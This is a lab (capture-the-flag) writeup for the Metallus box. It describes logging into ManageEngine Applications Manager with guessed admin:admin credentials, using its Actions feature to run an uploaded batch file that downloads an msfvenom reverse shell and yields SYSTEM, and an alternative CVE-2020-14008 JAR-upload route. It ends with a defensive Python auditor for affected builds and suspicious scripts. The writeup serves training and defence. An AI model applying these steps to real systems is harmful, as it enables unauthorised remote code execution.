Metallus
Proving Grounds PG Practice Metallus writeup
Nmap
The page footer shows that the software is Applications Manager (Build No:14700). I was able to log in by guessing the credentials `admin:admin`.
The target application has what are called 'Actions', which allow certain scripts and files to be executed when a certain parameter is met. To take advantage of this, we can first head to Admin > Upload Files / Binaries to upload a `cmd` command.
Before we upload, we first need to create a `msfvenom` reverse shell.
After this has completed, we then need to create a batch file, as only batch files and scripts are executed from the Actions on the target web server.
Create a batch file with the following:
When uploading, ensure the bottom-most option, 'Upload Script to <Product_Home>/working/', is selected.
After the upload, head over to Actions > Execute Program, then create a new Action as per the screenshot below:
After creation, set up a `netcat` listener on the port specified in the `msfvenom` command, then start a Python **SimpleHTTPServer** on the attacking machine in the directory containing the `msfvenom` reverse.exe file. After completing this, head over to **Actions > View Actions** and manually execute the script under the Execute tab.
We should see the script download reverse.exe from the Python SimpleHTTPServer.
Soon after, when the script executes reverse.exe, we should land a SYSTEM shell.
An alternative solution leverages **CVE-2020-14008** for a more scripted approach abusing JAR files.
Description:
Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.
Searching for exploits with `searchsploit` shows an RCE for build 14700.
The syntax for the exploit script is shown below:
After execution we should have another SYSTEM shell.
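From the defender's side, both paths above leave things that can be checked: the build number in the footer, and scripts uploaded to `<Product_Home>/working/` that pull down and run an executable. The following is an added example, not part of the original writeup or of the product; the script extension list, the `fetch-tool` placeholder and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Last affected build per the CVE-2020-14008 description quoted on this page.
LAST_AFFECTED_BUILD = 14710
SCRIPT_EXTS = {".bat", ".cmd", ".ps1", ".vbs", ".sh"}  # assumed script types
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
EXE_RE = re.compile(r"[\w.\-\\/:%]+\.exe\b", re.I)

def parse_build(footer_text):
    """Return the build number from a footer like '(Build No:14700)', or None."""
    m = re.search(r"Build\s*No\s*:\s*(\d+)", footer_text, re.I)
    return int(m.group(1)) if m else None

def build_is_affected(footer_text):
    """True when the footer shows a build at or below the last affected one."""
    build = parse_build(footer_text)
    return build is not None and build <= LAST_AFFECTED_BUILD

def audit_working_dir(working_dir):
    """Flag scripts that reference both a remote URL and an executable."""
    findings = []
    for path in sorted(Path(working_dir).iterdir()):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        text = path.read_text(errors="replace")
        urls = URL_RE.findall(text)
        exes = sorted(set(EXE_RE.findall(text)))
        if urls and exes:
            findings.append({"file": path.name, "urls": urls, "exes": exes})
    return findings

def demo():
    """Audit constructed sample files written to a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed samples; 'fetch-tool' is a placeholder, not a real command.
        Path(d, "task.bat").write_text(
            "fetch-tool http://192.0.2.10:8000/reverse.exe C:\\Temp\\reverse.exe\n"
            "C:\\Temp\\reverse.exe\n")
        Path(d, "cleanup.bat").write_text("del /q C:\\Temp\\*.log\n")
        Path(d, "notes.txt").write_text("http://192.0.2.10/a.exe\n")
        return audit_working_dir(d)

if __name__ == "__main__":
    print(build_is_affected("Applications Manager (Build No:14700)"))
    for finding in demo():
        print(finding)
```

Any hit in the working directory is worth correlating with the Actions configured under Execute Program and with who uploaded the file, since an admin account with guessable credentials was the entry point here.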